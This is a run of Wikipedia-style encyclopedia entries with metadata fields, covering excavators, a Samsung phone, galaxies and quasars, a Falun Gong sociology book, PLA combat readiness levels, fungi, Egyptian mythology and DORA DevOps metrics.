Takraf GmbH
Excavators
Dredgers | Type Es 3750 bucket chain excavator | [
"Engineering"
] | 521 | [
"Engineering vehicles",
"Mining equipment"
] |
76,953,946 | https://en.wikipedia.org/wiki/Type%20SRs%202000%20bucket-wheel%20excavator | The Type SRs 2000 (or Type SRs (K) 2000 in China) is a class of medium-sized bucket-wheel excavators built by TAKRAF. It is by far, one of the most common and recognizable BWEs built and sold by TAKRAF, with 56 Type SRs 2000s being commissioned and launched as of 2013.
Specifications
It is a medium-sized BWE that reach dimensions of , a length of , a width of and a height of ; its ground pressure is much lower than that of a D11 Dozer. It was built to replace the aging Type SRs 1200s BWEs, with the Type SRs 2000s possessing more efficient and cost-saving energy power lines and drive conveyor belt systems. The Type SRs 2000s are powered by at least four powered electric motor with 20-30kV trailing cable, and whilst it is externally powered like all BWEs, the total operational power is currently unknown.
The bucket-wheel dimensions are in diameter with 14 buckets. It is able to excavate a total capacity that can range between 4900 and 7000 m3/h with a digging force of around 100 kN/m. The bucket wheel excavator reaches 30 m digging height with a cutting depth of -10 meters.
Although construction of the Type SRs 2000 began in 1989 with one of the first batches being sent to Ekibastusz in then Kazakh SSR (USSR), it only began official global commissioning and serialization in 2008, with the China-export model, the Type SRs (K) 2000 being commissioned in 2013. The Type SRs (K) 2000 export model has a slight modification that allows the BWE to resist temperatures varying from +39 °C down to -39 °C, which is needed given the varied temperature change in Inner Mongolia.
Current and former operators
(former)
(former)
See also
List of largest machines
Bucket-wheel excavators
Landships
Type SRs 8000
References
Bucket-wheel excavators
Coal mining in Germany
RWE
Takraf GmbH | Type SRs 2000 bucket-wheel excavator | [
"Engineering"
] | 418 | [
"Mining equipment",
"Bucket-wheel excavators"
] |
76,954,017 | https://en.wikipedia.org/wiki/Samsung%20Galaxy%20M34%205G | Samsung Galaxy M34 is a mid-range smartphone from Samsung M Series released in July 2023. Samsung Galaxy M34 5G mobile was launched on 7 July 2023. The phone comes with a 120 Hz refresh rate 6.50-inch touchscreen display offering a resolution of 1080x2400 pixels (FHD+). Samsung Galaxy M34 5G is powered by an octa-core processor, Exynos 1280 based on 5nm manufacturing process. It comes with 6GB, 8GB of RAM. The Samsung Galaxy M34 5G runs Android 13 and is powered by a 6000mAh non-removable battery. The Samsung Galaxy M34 5G supports proprietary fast charging.
As far as the cameras are concerned, the Samsung Galaxy M34 5G on the rear packs a triple camera setup featuring a 50-megapixel primary camera, and an 8-megapixel camera. It has a single front camera setup for selfies, featuring a 13-megapixel sensor.
The Samsung Galaxy M34 5G runs OneUI 5 is based on Android 13 and packs 128GB, 256GB of inbuilt storage. It was launched in Midnight Blue, Prism Silver, and Waterfall Blue colours.
The phone is upgradeable to One UI 6.1 based on Android 14.
References
Samsung smartphones | Samsung Galaxy M34 5G | [
"Technology"
] | 276 | [
"Crossover devices",
"Phablets"
] |
76,954,632 | https://en.wikipedia.org/wiki/4C%20%2B48.48 | 4C +48.48 is a radio galaxy located in the constellation Cygnus. At the redshift of 2.343, it is one of the most distant galaxies ever seen, since light has taken at least 11 billion light-years to reach Earth.
History
4C +48.48 is believed to be a precursor of today's brightest cluster galaxies and an important probe of galaxy evolution. It is one of the many high- redshift powerful radio galaxies to show recent detections of strong emission lines at observed wavelengths which a new diagnostic tool is provided to study the objects, although the nature of line emission is a debate subject. Part of the difficulty might be due the usage of standard optical emission-line ratios commonly used differentiate between thermal ionization and low or high-excitation ionization from a nonthermal source, has until recently been problematic because rest frame optical emission from galaxies at z > 1 is redshifted to near-infrared wavelengths at current epochs.
Using a new generation of infrared spectrograph, it made it possible to begin systematic studies of the dominant ionization mechanisms in these galaxies via their rest frame optical emission-line spectra. In particular, using the new K-Band on the University of Hawaii 2.2 m telescope on Mauna Kea, provides the unique capability of simultaneous coverage of the 1.02.4 m wavelength band at typical spectral resolution / 700, while the infrared spectrograph (CGS4) on the 3.8 m United Kingdom Infrared Telescope (UKIRT) on Mauna Kea can provide coverage of either the full J-, H-, or K-band near-infrared windows at a spectral resolution of / 860.
Further study on 4C +48.48
A study conducted on 4C +48.48 in 2001, shows that although its dormant ionization mechanism is photoionized by its central active galactic nucleus, there is evidence of another mechanism which is located within the off-nuclear emission of each source. Through measuring [O II], [Ne III] and [O III] for several regions in 4C +48.48, this suggests shock ionization in one region.
Further observations from PPAK bundle of the PMAS spectrograph that is mounted on the 3.5m on the Calar Alto Observatory, show there various emission lines are detected within this wavelength range for 4C +48.48, including Lyα (1216 Å), NV (1240 Å), CIV (1549 Å), HeII (1640 Å), OIII] (1663 Å) and CIII] (1909 Å). The Ly, CIV and HeII emission lines in 4C +48.48 shows a striking morphology, which they extend several arcseconds towards the north-east section, in close alignment with the radio source. However, on the other side of the nucleus, the alignment is not present, but the south-western radio source undergoes a dramatic 45 deg bend to the south, with its line emission extends ~5 " (40 kpc) from the nucleus towards the west. The CIV and HeII lines show a similar spatial distribution to that of Ly.
The properties above, suggests 4C +48.48 is embedded inside a large ionized gas nebula where Lyα emission is extended across ~100 kpc or more. Not to mention, there is a band of low Lyα/CIV that is running perpendicular to its radio axis, to the location of its active nucleus. This might be a feature of an observed signature on an edge-on disk of neutral gas.
Weaker lines are also detected through the deep spectra of 4C +48.48. Based on comparisons between its various ionization models and emission line ratios, the line emitting gas is found to be enriched with metals, in which is further ionized by its hard radiation field of its active nucleus.
From another research, which using deep spectroscopy of the ultraviolet (UV) line and continuum emission obtained from KECK II and the Very Large Telescope, they were able to investigate the nature of jet-gas interactions in 4C +48.48. From the investigation, the kinematically perturbed gas is found to be blueshifted in respect to the kinematically quiescent gas, spatially expended and detected on both sides of the nucleus. This is proposed that the perturbed gas is part of jet-induced outflow, with dust on the far side of the object, obscuring the outflowing gas. The spatial extent of the blueshifted perturbed gas is typically ~35 kpc, implying the dust is spatially extended on similar spatial scales.
References
Cygnus (constellation)
Radio galaxies
Principal Galaxies Catalogue objects
4C objects | 4C +48.48 | [
"Astronomy"
] | 985 | [
"Cygnus (constellation)",
"Constellations"
] |
76,958,638 | https://en.wikipedia.org/wiki/Frederick%20Snare | Frederick Snare (December 4, 1862September 27, 1946) was an American engineer and international construction contractor.
Career
After an unsuccessful contracting business in 1885 in Huntingdon, he relocated to Philadelphia and established a new contracting firm. Frederick Snare and Wolfgang Gustav Triest established the Snare & Triest Company in 1898. The Snare & Triest Company was incorporated in 1900, with Snare as the President. The Snare & Triest Company became the Frederick Snare Corporation in the 1920s. Snare's company operated in the United States, Cuba, Peru, Argentina, Columbia, and Panama. It grew to become one of Latin America's major contractual engineering firms.
In Havana, he constructed a country club after a group of American and British residents, led by Snare, arrived in 1911 and purchased an estate in Marianao. The original country club that Snare had established was renamed the Havana Biltmore Yacht and Country Club by the 1930s.
Golf
In 1922 and 1925, he won the Seniors' Golf Championship, an annual tournament of the United States Seniors Golf Association. Snare was a member of the Garden City Golf Club and National Golf Links of America. In 1927, he captained the United States Expeditionary Golf Forces at the first annual triangular international tournament in England.
Death
Frederick Snare died on September 22, 1946, at the Anglo-American Hospital in Havana, Cuba.
References
1862 births
1946 deaths
Civil engineers
American civil engineers
Engineers from Pennsylvania
Civil engineering contractors
American civil engineering contractors
American bridge engineers | Frederick Snare | [
"Engineering"
] | 308 | [
"Civil engineering",
"Civil engineering contractors",
"Civil engineers"
] |
76,958,948 | https://en.wikipedia.org/wiki/Becoming%20Activists%20in%20Global%20China | Becoming Activists in Global China: Social Movements in the Chinese Diaspora is a non-fiction book by Andrew Junker, an adjunct assistant professor in sociology at the Chinese University of Hong Kong. Published by Cambridge University Press in 2019, the book is a sociological study of the Falun Gong movement and the post-1989 democracy movement (Minyun), both suppressed in China. By comparing these two movements from a social movement perspective, Junker argued that Falun Gong's more enduring mobilization results from its decentralized organizational structure and demonstrates the potential for progressive social change.
Background
Junker holds a Ph.D. in sociology from Yale University and is the Hong Kong Director of the Yale-China Association. He also has academic degrees in religious studies and East Asian studies. His papers have been published in Mobilization, Sociology of Religion, and the American Journal of Cultural Sociology.
The book is based on Junker's research of Falun Gong and the democracy movement through interviews and observations in the United States, Japan, Taiwan, and Hong Kong, conducting field visits from 2006 through 2015 and analyzing materials from archives and organizational publications. He employed quantitative narrative analysis to dissect the information collected.
Content
Junker's comparative analysis highlights how Falun Gong and Minyun navigated and resisted the Chinese Communist Party (CCP) from within the global Chinese diaspora. He frames Falun Gong not just as a religious movement but also as a social movement. It is the first purely sociological study of Falun Gong's resilience.
Drawing on academic research, Junker identified similarities between the two movements, such as their reliance on digital media and transnational activities. He found that Falun Gong, in contrast to Minyun, succeeded by adopting "a diffuse, decentralized, and bottom-up approach motivated by Falun Gong's religious ethic of activism" in terms of participants, protests, progressive potential, and global political impact.
Junker observed that Minyun activism adhered to established Chinese norms of authority, with protests enacted as confrontations between counter-elites and authorities. In contrast, Falun Gong's activism broke with tradition through "its grassroots-based, diffuse nonviolent protest campaigns" to leverage public opinion and resources to pressure authorities.
Junker argued Falun Gong's activism contributes to progressive social change. Regardless of the ideology, the protest mobilization to defend freedom of religion has a "progressive character" central to liberal democratic modernity. Its grassroots activism was "so decentralized and emphasized individual initiative" with a spillover effect on the Chinese dissidents and diaspora community.
Reception
The book is recognized for its theoretical contributions and ability to bridge the study of new religious movements with broader sociopolitical analysis. It is considered essential reading for scholars interested in the Chinese diaspora, social movements, and the intersection of religion and politics in contemporary China.
Chengpang Lee from the National University of Singapore criticized Junker's claims that Falun Gong has seen a reduction in politicization since 2000, and noted that Junker did not fully discuss the fact that Falun Gong published the "Nine Commentaries on the CCP" in 2004 and subsequently launched a campaign encouraging people to withdraw from CCP membership. Lee also argued that Junker did not fully address the role of Li Hongzhi's leadership in the movement, and their usage of traditional Chinese cultural elements such as symbols of the Tang dynasty.
In 2020, the book won the Honorable Mention for the Asia/Transnational Book Award by the American Sociological Association's Asia and Asian America Section.
See also
The Religion of Falun Gong
Falun Gong and the Future of China
Qigong Fever: Body, Science, and Utopia in China
References
Sociology
Political sociology
Asian studies
Democracy movements
Political science
Social movements
Books about China
Books about Falun Gong
Cambridge University Press books | Becoming Activists in Global China | [
"Biology"
] | 777 | [
"Behavioural sciences",
"Behavior",
"Sociology"
] |
76,966,654 | https://en.wikipedia.org/wiki/People%27s%20Liberation%20Army%27s%20Combat%20Readiness%20Levels | The PLA's combat readiness level (中国人民解放军战备等级) is the alert awareness system used by the People's Liberation Army to signal the PRC's combat readiness posture (similar to the American DEFCON system). Different readiness levels activate different set of preparatory actions by the PLA. The system has four levels, with One being the highest (possible war imminent) and Four the lowest. It is the Central Military Commission's responsibility (through the JOCC) to call changes in the readiness level. At different levels, the People's Liberation Army takes different actions to deal with different degrees of emergency.
China uses other readiness systems, such as the Firefighting Action Readiness system, and the Militia's three-level readiness system.
System levels
The PLA's combat readiness system is divided into four levels. Each level has clearly indicated measures and actions of mobilization that the PLA needs to take to face the crisis. The CMC assesses the impact of foreign military activities, and the likelihood of China being attacked.
Different combat readiness levels may apply only to specific areas, or to specific services and arms of the PLA. In case of localized threats, high levels may apply to a district and not to others.
The measures or actions required by the PLA's combat readiness level go from very basic, such as conducting combat readiness inspections, strengthening patrols, and maintaining communications open, to highly strict and urgent measures of mobilization and preparation for shooting war if the emergency is deemed to require it.</ref>
Contrary to the DEFCON system, a state of perfect defense normality does not have a readiness number, and level 1 does not imply the near-certainty of shooting war. The PLA's military doctrine explicitly recommends the use of readiness signalling as a form of deterrence.
The standard conditions for each of the readiness levels are as follows:
The readiness system is not used in situations of complete low international tensions. It can also be raised by steps or by several steps depending on the changing international situation.
History
Since the establishment of the PLA's combat readiness level system, the CRL has been raised several times.
Taiwan Strait Crisis(1996)
In 1995, Republic of China president Li Teng-Hui visited the US in an official capacity. The PRC government decided to carry out two large scale missile test operations around the island of Taiwan to deter any further moves. The US reacted by sending two 7th fleet carrier groups to cruise through the Taiwan Strait. As a reaction, the CMC declared the Nanjing Military Region raised to level one.
"Two Countries" Thesis
In 1999,then President of the Republic of China Li Teng-hui declared the "Two Countries" thesis that seemed to support independence. Forces in Fujian were raised to level 3 readiness.
Hainan Island incident
On 1 April 2001, an American EP-3 Aries sigint plane collided midair with a J-8II interceptor south of Hainan. The Chinese pilot died and the American plane was forced to land in Hainan island. PLA Forces on the were placed on level 1 readiness for a short period, until negotiations started with the US.
2004 Republic of China Elections
In 2004,ROC's president Chen Shui-bian was seeking reelection. For over a year before the election, the PLA forces on the Taiwan Strait were kept on state 2.
2008 Republic of China elections
For the 2008 ROC elections, the readiness level of the forces in the strait were raised to level 1.
2011 Kashgar Terrorist Attacks
On 30 July 2011, double attacks on Kashgar city of Xinjiang province resulted in declaration of a level 1 event, and martial law was imposed in the region to preempt any further unrest.
2011 Kim Jong-Il's death
On 17 December 2011, to deal with the uncertainty associated with the sudden death of North Korean leader Kim Jong-Il, the CMC increased readiness state to 3 on the Sino-Korean border.
2013 Korean Peninsula Crisis
2013年2月12日2 December 2013, North Korea decided to disregard international opposition and restart nuclear testing, and in 5 March the same year, it declared its intention not to be bound to the Korean Armistice (for the sixth time). In the face of North Korean hardline attitude, the PRC mobilized extra troops to its border, and declared a readiness condition 1 for the border area.
Galwan Valley Skirmishes
In 2020, as the result of the Galwan valley skirmishes and consequent border tensions, the readiness level was raised to level 3 for the Xinjiang and Tibet Military Districts. The level was further raised to level 2 after actual shooting was reported.
References
See also
Joint Operations Command Center
Military of the People's Republic of China
Alert measurement systems | People's Liberation Army's Combat Readiness Levels | [
"Technology"
] | 965 | [
"Warning systems",
"Alert measurement systems"
] |
76,967,168 | https://en.wikipedia.org/wiki/Reteh-qabet | Reteh-qabet (sometimes Reteh-kabet) is referred to in Egyptian mythology and astronomy as the boundaries of the heavens. The meaning "that pushes the chest back" can be compared to the breathing process and refers specifically to breathing shortly before birth or shortly before death. The associated entry into the means "beginning of life", while the entry into the means impending death.
Background
The Reteh-qabet is the beginning of a region of absolute darkness, which is understood as the edge of the sky and as the "back of the Nut". It is the transition area to Keku-semau, the primordial darkness, which is also considered the top of the sky. In the Book of Nut, the Reteh-qabet is described as a region "in which Re never rises". It is considered the limit of the four cardinal directions, which lie simultaneously in the primordial waters Nu and lose their meaning outside the Reteh-qabet, since it is "the place without directions". The mythological ideas of the Egyptians come very close to the modern conception of the universe, which states that there are the well-known dimensions. Earth, with its limitation to the three dimensions of length, width and height, has lost its sole valid definition.
Literature
: Floor plan of the course of the stars - the so-called groove book. The Carsten Niebuhr Institute of Ancient Eastern Studies (among others), Copenhagen 2007, ISBN 978-87-635-0406-5, S. 141.
References
Egyptian mythology
Locations in Egyptian mythology
Astronomy in Egypt
Ancient astronomy | Reteh-qabet | [
"Astronomy"
] | 341 | [
"Ancient astronomy",
"History of astronomy"
] |
76,967,306 | https://en.wikipedia.org/wiki/Hydrotelluride | A hydrotelluride or tellanide is an ion or a chemical compound containing the [HTe]− anion which has a hydrogen atom connected to a tellurium atom. HTe is a pseudohalogen. Organic compounds containing the -TeH group are called tellurols. "Tellanide" is the IUPAC name from the Red Book, but hydrogen(tellanide)(1−) is also listed. "Tellanido" as a ligand is not named, however ditellanido is used for HTeTe−.
Hydrotellurides are usually unstable at room temperature.
List
References
Tellurium(II) compounds
Anions | Hydrotelluride | [
"Physics",
"Chemistry"
] | 140 | [
"Ions",
"Matter",
"Anions"
] |
76,969,345 | https://en.wikipedia.org/wiki/I%20Zwicky%201 | I Zwicky 1 (shortened to I Zw 1), also known as UGC 545, is a galaxy located in the constellation Pisces. It is located 847 million light-years from Earth and is said to be the nearest quasar (QSO) due to its high optical nuclear luminosity of MV = -23.8 mag.
Discovery
I Zwicky 1 was discovered by Fritz Zwicky in 1964. According to Zwicky, the object is classified as a compact galaxy, whom he commented it as "variable blue spherical, very compact, with a patchy halo. It is listed as the first object in the Zwicky catalogue. At the redshift of 0.0611, I Zwicky 1 shows spectral properties of high-redshift quasars that are blueshifted by 1,350 km-1 according to the study conducted by Buson & Ulrich in 1990.
The photometric history of I Zwicky 1, dates back to 1909, where it has been investigated on Harvard photographic plates. The available data indicates the galaxy is variable and probably undergoes outbursts of about 0.7 mag above a brightness level that is itself variable by about 0.7 mag.
Characteristics
The nucleus of I Zwicky 1 is found to be active. It is classified as a prototypical narrow-line Seyfert 1 galaxy and contains high amounts of X-ray luminosity. The galaxy contains a peculiar spectrum, which in addition to the usual broad- and narrow-line regions, there are two emission regions emitting broad and blue shifted [O III] lines making it a peculiarly interesting object. The QSO sits inside its host galaxy which is revealed to be a face-on spiral galaxy. It shows two asymmetric spiral arms and knots of star formation. This makes I Zwicky 1 an ideal candidate for studying properties of QSO hosts. It is also possible that certain tidal interactions triggers activity in I Zwicky 1, both starburst and QSO.
I Zwicky 1 is classified a Markarian galaxy (designated both Mrk 1502 and Mrk 9009). Compared to other galaxies, the nucleus emits excessive amounts of ultraviolet rays. This is caused by undergoing a strong starburst located in the central ring-like area of the galaxy.
Further study on I Zwicky 1
I Zwicky 1 shows existence of V-, R-, and H-bands with sturdy carbon monoxide (CO) featured in the J = 1-0 and J = 2-1 lines. When further observed, researchers found that the J = 1-0 line is brighter compared to the J = 2-1 line found with less luminosity. Given location in galactic molecular clouds, the carbon monoxide must be larger on the scale of the 26 kpc J = 1-0 beam size, with optical depth and being thermalized.
Researchers who studied interstellar medium and star formation, found out a two-component model is required for I Zwicky 1 in which 2/3 of the far-infrared brightness originates in the disk and one-third originates from the nucleus. The star-forming rate, efficiency of the disk and the nucleus of I Zwicky 1 was estimated by researchers, whom they found that the values are similar to the luminosity of galaxies studied by IRAS. Overall, the disc star formation, is closer to topmost values of ~30 L_sun_/M_sun_ that is found inside galactic star-forming regions of the Milky Way such as M17 or W51. When looking at its nuclear near-infrared colors analysis, researchers suggest I Zwicky 1 has a combined quasar nucleus and defunct stellar component that matches about 10 to 20% of the flux density at 2.2 microns. This suggests the size of I Zwicky 1's molecular bulge is estimated to be 1" to 2" (1.2-2.4 kpc). But only the nucleus is revealed through optical spectrum and large X-ray luminosity.
Millimeter Spectroscopy
Further studies showed the mapping of 12CO (10) line emission in I Zwicky 1 whom researchers conducted observations with Institut de radioastronomie millimétrique (IRAM) millimeter interferometer on the Plateau de Bure, France, between January and February 1995. There, they placed four 15 m antennas in four different configurations. With 24 baselines provided by the four 15 m antennas, ranging from 24 to 288 m in length, they were supplied by SIS receivers with single-sideband (SSB) system temperatures of 170 K above the atmosphere. Located at redshift 0.0611, the observed frequency of I Zwicky 1 was 108.633 GHz.
The CO maps were seen by the observations from IRAM 30m telescope. This resolution of a synthesized beam was uniform weighted of 19, but five resolution CLEAN maps (natural weighting) were made by spectral resolutions of 10 km s−1 and 40 km s−1 to examine the extended disk structure and velocity field. For the core component, researchers used the 19 resolution CLEANed maps with a spectral resolution of 20 km s−1. To investigate the structure dynamics of the nucleus, which they reckoned these velocity maps together with p-v diagrams alongside major and minor kinematic axes of I Zwicky 1.
Near-Infrared Spectroscopy and Imaging
I Zwicky 1 was observed by K-band (2.20 m) in January, 1995 with a MPE imaging spectrometer making use of 3D images with a 3.6 m telescope in Calar Alto, Spain. The observations in the H-band (1.65 m) on the other hand, were carried out in December 1995, at the William Herschel Telescope located in La Palma, Canary Islands. From two observations, researchers found that the image scale was 05 pixel−1 and total integration time on source was 4200 s and 1530 s for the K-band and H-band, respectively.
Molecular gas properties
The properties of the molecular gas are important for acknowledging the total star formation and powering AGNs, given molecular clouds are the major reservoirs for such occurrences. According to researchers, looking inside the spiral arms of the QSO host galaxy, they detected the molecular line emission. Seeing this, they were able to break up the line emission into a separate core and disk components. Through analyzing the velocity field, a circumnuclear ring of molecular gas is found. It has a similar size to starburst rings in nearby galaxies. With a spatial resolution of 19 (2.2 kpc), no signs of gas is suggested streaming straight to the nucleus.
Comparison of starburst rings
In a study where starburst rings are observed in galaxies, the rings in I Zwicky 1 are suggested to be formed by gravitational interactions, because of high rates of stars and gas. These rings are detected in midinfrared continuum, near-infrared colors, molecular gas line emission, and H line emission. Although, the overall structure of these rings are not even, it is feasible they are formed by two twisted spiral arms on every side of the nucleus. To see whether the rings are unique or ordinary, researchers found two other galaxies, NGC 7552 and NGC 7469. They found the ring properties are alike to one another for all three galaxies. But there is a difference in total bolometric luminosity which might be linked to the internal structure of the rings, and to a certain, starburst regions are fueled within the ring region.
The starburst rings of I Zwicky one are three times older compared to those in NGC 7552 and NGC 7469. Using the comparison, the molecular ring researchers detected in the 12CO(10) line emission, might contain starburst like other circumnuclear rings. This indicates the luminosity fraction observed for QSOs and Seyfert galaxies is mainly caused by circumnuclear starbursts in the centers of host galaxies, and that the AGNs are not only responsible for energy output overall in the optical and infrared light. Such star formation activity contributed to bolometric luminosity only range about 10 to 50% in I Zwicky 1, compared to observations for NGC 7469.
To sum things up, a young starburst is associated with this circumnuclear ring. The properties of this starburst ring in I Zwicky 1, are similar to nuclear activity sources. When looking at similarities, the rings are a possible common phenomenon that contributes significant fraction to luminosity in central regions.
Supermassive black hole
The supermassive black hole in I Zwicky 1, has an estimated mass of M. = 9.30+1.26 - 1.38 x 106 solar masses. This suggests the accretion rate is 203.9+61.0-65.8 L edd c-2, indicating there is a super-Eddington accretor, where LEdd is the Eddington luminosity and c is the speed of light. By splitting up Hubble Space Telescope images, researchers find the stellar mass of the bulge of its host galaxy is similar to log(M budge/M○ = 10.92 + 0.07. Looking at these values, they suggest the black hole has bulge mass ratio of ~10−4, which is smaller when compared to classical bulges of elliptical galaxies.
An article published in 2021, found out according to observations by ESA's XMM-Newton and NASA's NuSTAR space telescopes, the black hole emits out X-ray flares from the region. Further analysis by researches showed, brief flashes of photons that are found consistent in the re-emergence of emission, proving they had reverberated from black hole's accretion disk in form light echoes, which are subsequently distorted and extended by the galaxy's strong gravitational field.
References
00545
Pisces (constellation)
Seyfert galaxies
Quasars
Starburst galaxies
03151
IRAS catalogue objects
Markarian galaxies | I Zwicky 1 | [
"Astronomy"
] | 2,089 | [
"Pisces (constellation)",
"Constellations"
] |
76,969,858 | https://en.wikipedia.org/wiki/Polevitzky%2C%20Johnson%20and%20Associates | Polevitzky, Johnson and Associates was a architectural firm with headquarters in Miami, Florida.
History
Polevitzky, Johnson and Associates, Inc. was established in 1951 in Miami, Florida. After coming back from World War II in the mid-1940s, Igor B. Polevitzky opened a new office in the Brickell neighbourhood and partnered with Verner Johnson.
Illustrator J. M. Smith, Jerome L. Schilling, Samuel S. Block, and William H. Arthur were among the firm's longtime associates. Photographers like Earl Struck, Jim Forney, Rudi Rada, Ernest Graham, Samuel H. Gottscho, and Robert R. Blanch were among those who worked as photographers frequently.
In 1957, Meyer Lanksy commissioned the firm's senior partner Igor Polevitzky to design the Hotel Habana Riviera. Along with Verner Johnson and Associates, Polevitzky collaborated with Miguel Gastón and Manuel Carrerá, two architects from Cuba. Built in the Vedado neighborhood of Havana, Cuba, the sixteen-story skyscraper was constructed on the Malecón beachfront boulevard.
The Miami-based architectural firm was brought in to redesign the original Biltmore Yacht and Country Club after the winter of 1957, but the Cuban Revolution stopped it from ever being built.
The founders of Polevitzky, Johnson and Associates disbanded in the mid-1960s. Around 1967, Igor Poletvitzky relocated permanently from his Miami home to Estes Park, Colorado. The firm took on projects until the early 1970s.
References
Architecture firms
Architecture organizations
Architecture firms of the United States
Architecture firms based in Florida | Polevitzky, Johnson and Associates | [
"Engineering"
] | 334 | [
"Architecture organizations",
"Architecture"
] |
76,973,233 | https://en.wikipedia.org/wiki/Quadracaea%20roureae | Quadracaea roureae is a species of fungus in the division Ascomycota. The fungus has specialised cells that produce multiple spores, flask-shaped cells that release spores by breaking open, and a unique way of shedding its spores. The type specimen of this hyphomycetes fungus was found growing on dead branches of Rourea minor in Hainan Bawangling National Nature Reserve. At the time of its original publication, it was only known to occur at the type locality in China.
Description
Quadracaea roureae forms colonies on natural substrates that are spread out, brown in color, and covered in fine hairs. The mycelium, or fungal network, is partly superficial and partly embedded within the substrate. It consists of branched, septate (segmented) hyphae that are pale brown and smooth-walled, measuring 1–2 micrometres (μm) in thickness.
The conidiophores, which are the structures that bear spores, are macronematous (having well-developed stalks) and mononematous (single or unbranched). They can appear singly or in groups, and are straight or slightly curved. These structures are smooth and lighter in colour towards the apex, can grow up to 81 μm long, and are 3–4.5 μm wide. They bear separating cells at various levels.
Conidiogenous cells, which produce the spores, are more or less cylindrical, measuring 6–8.5 μm in length and 2.5–3.5 μm in width. These cells are polyblastic, meaning they produce multiple spores, and are terminal (at the end of the structure) but can become intercalary (inserted along the length). They are pale brown to brown in colour and integrated into the conidiophore structure.
Separating cells are acropleurogenous (producing spores at the tip and along the sides), ampulliform (flask-shaped), and taper towards the apex. After spore release, these cells appear empty with an open end. They are pale brown in colour.
The conidia (asexual spores) are solitary, dry, and obpyriform (pear-shaped). They have three transverse septa and are slightly constricted at these points. Conidia measure 20–26.5 μm in length and 7.5–9.5 μm in width. The basal cell of the conidium is smooth and pale brown, featuring a prominent frill at the base. The second and third cells are thick-walled and dark brown, with the second cell being broader and darker. The apical cell is narrowly conical, pointed, and colourless or nearly so.
The synanamorph (an alternate form) of Quadracaea roureae resembles Selenosporell. The apical cell of each conidial arm produces blastic (budding) conidia that are fusiform (spindle-shaped), slightly curved, aseptate (without septa), and hyaline (glassy). These secondary conidia measure 4.5–5.5 μm in length and 0.6–1 μm in width.
References
Ascomycota
Fungus species
Fungi described in 2012
Fungi of China | Quadracaea roureae | [
"Biology"
] | 684 | [
"Fungi",
"Fungus species"
] |
76,974,120 | https://en.wikipedia.org/wiki/Quadracaea%20stauroconidia | Quadracaea stauroconidia is a species of fungus in the division Ascomycota. This hyphomycetes fungus was formally described as a new species in 2013. The type specimen was collected by the authors from , (Santa Teresinha, Bahia, Brazil), where it was found growing on submerged leaves. The species epithet, stauroconidia, makes reference to the star-shaped conidia (asexual spores).
Description
Quadracaea stauroconidia shares similarities with several related fungal species but can be distinguished by specific characteristics of its reproductive structures. The conidiophores of Q. stauroconidia are unbranched, septate, and erect, ranging in colour from brown at the base to paler towards the apex. These structures measure 84–225 μm in length and 3–9 μm in width.
The conidiogenous cells, which produce the spores, are terminal or intercalary and cylindrical in shape, measuring 12–16.5 μm by 3–3.8 μm. These cells are light brown and can sometimes show percurrent proliferation. The separating cells are single or in clusters of up to five, thin-walled, smooth, and pale brown, with dimensions of 3–6 μm by 3 μm.
The conidia (asexual spores) are solitary, dry, septate, and constricted at the septa. They are smooth, thin-walled, and stauroform (cross-shaped). The central cell is angular and dark brown, measuring 8.5–13 μm by 7.5–11 μm. The apical cells are conical and pale brown, with the first cell measuring 4–5 μm by 6 μm, and the second cell phialidic, measuring 4–5 μm by 3–4.5 μm. There are usually two, sometimes one, lateral cells that are conical and rounded at the top, pale brown, measuring 4–5 μm by 4–6 μm. These lateral cells may sometimes have a middle septum forming a phialidic cell. The basal cell is conical, truncated at the base with a short frill, pale brown, and measures 4–5 μm by 5–6 μm. The phialidic cells produce smooth, falcate, hyaline conidia that lack septa and measure 7.5–9 μm by 0.7–0.9 μm.
References
Ascomycota
Fungus species
Fungi described in 2013
Fungi of Brazil | Quadracaea stauroconidia | [
"Biology"
] | 535 | [
"Fungi",
"Fungus species"
] |
76,974,432 | https://en.wikipedia.org/wiki/DevOps%20Research%20and%20Assessment | DevOps Research and Assessment (abbreviated to DORA) is a team that is part of Google Cloud that engages in opinion polling of software engineers to conduct research for the DevOps movement.
The DORA team was founded by Nicole Forsgren, Jez Humble and Gene Kim. and conducted research for the DevOps company Puppet and later became an independent team (with Puppet continuing to produce reports by a new team).
Whilst the founding members have departed, the DORA team continue to publish research in the form of annual State of DevOps Reports.
State of DevOps Reports
The DORA team began publishing State of DevOps Reports in 2013. The latest DORA State of DevOps Report published in 2023 found culture and a customer centric focus key to success, whilst AI was providing limited benefits.
DORA Four Key Metrics
For the purposes of their research, Four Key Metrics, sometimes referred to as DORA Metrics, are used to assess the performance of teams.
The four metrics are as follows:
Change Lead Time - Time to implement, test, and deliver code for a feature (measured from first commit to deployment)
Deployment Frequency - Number of deployments in a given duration of time
Change Failure Rate - Percentage of failed changes over all changes (regardless of success)
Mean Time to Recovery (MTTR) - Time it takes to restore service after production failure
Using these performance measures, the team are able to assess how practices (like outsourcing) and risk factors impact performance metrics for an engineering team. These metrics can be crudely measured using psychometrics or using commercial services.
Limitations
These metrics have been used by organisations to evaluate team-by-team performance, a use-case which the DORA team issued a warning against in October 2023.
Some professionals have argued that using the DORA Four Key Metrics as a target within engineering teams encourages focus on wrong incentives. For example; James Walker, CEO at Curiosity Software, has argued the "metrics aren’t a definitive route to DevOps success" and challenges in using them for team comparisons.
Research conducted by the computer scientist Junade Ali and the British polling firm Survation found that both software engineers (when building software systems) and public perception (when using software systems) found other factors mattered significantly more than the outcome measures which were treated as the "Four Key Metrics" (which ultimately measure the speed of resolving issues and the speed of fixing bugs, and are used to create the findings in the book), and risk and reward appetite varies from sector-to-sector.
Ali has also criticised the research on the basis that reputable opinion polling firms who comply with the rules of organisations like the British Polling Council should publish their full results and raw data tables, which the DORA team did not do - and additionally that the sponsors of the polling (Google Cloud and previously Puppet) create products which have a vested interest in having software engineers deliver faster (despite research indicating high levels of burnout amongst software engineers), which the results of the research ultimately supported. Despite the authors arguing that speed of delivery and software quality go hand-in-hand, Ali has offered several counter-examples; including the comparatively high quality of aviation software despite infrequent changes, contrasted with rapid application development being pioneered in the software that resulted in the British Post Office scandal and agile software development being used in the software responsible for the 2009–2011 Toyota vehicle recalls.
The software developer Bryan Finster has also discussed how, as correlation does not imply causation, organisations who are considered "high performing" in the research are not high performing because they focussed on the DORA metrics, but instead focussed on delivering value to users and arguing the metrics should be used as "trailing indicators for poor health, not indicators everything is going well".
Accelerate (book)
